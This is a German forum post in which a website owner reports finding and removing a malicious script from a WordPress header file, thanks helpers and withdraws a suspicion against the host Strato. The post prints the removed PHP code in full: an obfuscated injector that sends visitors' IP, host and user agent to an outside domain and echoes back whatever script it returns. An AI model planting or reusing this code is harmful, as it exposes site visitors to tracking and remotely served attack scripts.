So, hab die Lösung :-) Hab folgendes aus dem Header rausgenommen:
PHP
<?phperror_reporting(0); ini_set('display_errors',0); $wp_i05003 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_i05003) && !preg_match ('/bot/i', $wp_i05003))){
$wp_i0905003="http://"."web"."basefont".".com/font"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_i05003);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_i0905003);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_05003i = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_05003i,1,3) === 'scr' ){ echo $wp_05003i; }
?>
Alles anzeigen
Ist ein Schadscript, jetzt hab ich gute Ladezeiten....
Schon der Hammer, was sich da alles findet!
Entschulde mich hiermit auch bei Strato für den falschen Verdacht :-)
Und danke noch mal an alle, die mich hier unterstützt haben !!!!!